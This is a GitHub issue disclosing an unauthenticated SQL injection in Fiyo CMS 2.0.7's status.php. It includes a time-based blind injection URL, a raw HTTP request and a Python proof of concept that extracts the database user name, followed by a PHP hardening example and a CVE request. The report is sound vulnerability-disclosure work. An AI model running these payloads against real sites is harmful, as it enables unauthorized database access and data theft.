
dapur\apps\app_user\Status.php: $_GET['stat'] and $_GET['id'] variables allow SQL injection #7

Open
Rai4over opened this issue Jul 21, 2017 · 2 comments


Rai4over commented Jul 21, 2017

Hello, I found some problems with Fiyo CMS and hope this helps you and your work.

Fiyo CMS version 2.0.7 has a SQL injection vulnerability.
No login is needed to exploit this vulnerability.

The code does not validate the $_GET['stat'] and $_GET['id'] variables.
These two variables can be controlled by a malicious attacker, who can control the program's execution flow
and put a malicious string into the database query, causing SQL injection.

File location: dapur/apps/app_user/controller/status.php
(https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/apps/app_user/controller/status.php)



http://127.0.0.1/FiyoCMS/ is the installation path of the site.

Vulnerability verification ① (send a SQL injection request that causes a response delay)

Get_Url: http://127.0.0.1/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
Referrer: http://127.0.0.1


Detailed HTTP request packet

GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/FiyoCMS/
Cookie: Hm_lvt_2f11040b51649a178c3fc835fd60c6f1=1499412807,1499422916,1499519057,1499663544; PHPSESSID=l25a9dch25s6uhmpara5klmoo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

The response was delayed by 5 seconds.

Vulnerability verification ② (use the Python script to perform the SQL injection and retrieve the current database user name)

Python PoC code

import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/FiyoCMS'   # no trailing slash; the path below starts with '/'
    vuln_path = '/dapur/apps/app_user/controller/status.php?stat=1&id='
    headers = {'Referer': Target_url}

    # Step 1: time-based blind injection to find the length of user().
    # A request that takes longer than 1 s means the sleep(2) branch ran.
    print('Began to guess the length of the database user name !!')
    length = None
    for x in range(1, 50):
        start_time = time.time()
        payload = '8899 or if(length(user())={x},sleep(2),0)'.format(x=x)
        requests.get(Target_url + vuln_path + payload, headers=headers)
        if (time.time() - start_time) > 1:
            length = x
            break

    if length is None:
        raise SystemExit('Could not determine the user name length')
    print('The database user name length is {length} !!'.format(length=length))

    # Step 2: guess user() one character at a time.
    # MySQL substr() is 1-indexed, so positions run from 1 to length.
    print('Start guessing the database username !!')
    username = ''
    pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
    for x in range(1, length + 1):
        for p in pay_str:
            start_time = time.time()
            payload = "8899 or if(substr(user(),{q},1)='{w}',sleep(2),0)".format(q=x, w=p)
            requests.get(Target_url + vuln_path + payload, headers=headers)
            if (time.time() - start_time) > 1:
                username = username + p
                print(username)
                break
    print('The database user name is {username}'.format(username=username))


Discoverer: Rai4over of Neusoft
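For the maintainers, an added example (not Fiyo CMS code) of how a handler like status.php can be hardened: validate stat and id as integers, allow-list the status value, run the update as a prepared statement with typed bindings, and require an admin session since the report shows the endpoint needs no login. The table and column names, the 0/1 status values, the session key and the connection details are assumptions.

```php
<?php
// Added example, not Fiyo CMS code: a hardened status handler for the
// stat/id parameters reported above. Table and column names, the allowed
// status values (0/1), the session key and the DB credentials are assumptions.
declare(strict_types=1);

function cms_admin_logged_in(): bool
{
    // Assumed session layout: the report shows the endpoint needs no login,
    // so the handler must sit behind the CMS's admin session check.
    session_start();
    return !empty($_SESSION['admin_id']);
}

function update_user_status(PDO $db, array $query): bool
{
    // Validate both parameters as integers before they get near any SQL.
    // "21 or if(1,sleep(5),0)" fails FILTER_VALIDATE_INT and is rejected,
    // so it can never change the structure of the query.
    $id   = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    $stat = filter_var($query['stat'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false || $stat === false) {
        return false;
    }
    // Allow-list the status values the application actually uses (assumed 0 and 1).
    if (!in_array($stat, [0, 1], true)) {
        return false;
    }
    // Prepared statement with typed bindings: the SQL text is fixed and the
    // values travel separately, so user input is only ever data.
    $stmt = $db->prepare('UPDATE user SET status = :stat WHERE id = :id');
    $stmt->bindValue(':stat', $stat, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    return $stmt->execute();
}

if (!cms_admin_logged_in()) {
    http_response_code(403);
    exit;
}

$db = new PDO('mysql:host=127.0.0.1;dbname=fiyo;charset=utf8mb4', 'dbuser', 'dbpass', [
    // Server-side prepares; emulated prepares would splice values into the SQL client-side.
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);

http_response_code(update_user_status($db, $_GET) ? 200 : 400);
```

With this in place, the delayed-response request shown above gets a 400 with no query executed, which is also the behaviour to test for when verifying a fix.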

firstryan (Contributor) commented Jul 21, 2017 via email

Rai4over (Author) commented

@firstryan If it is convenient, please confirm another file to delete the problem, and please help me apply for a CVE ID. Thank you very much.
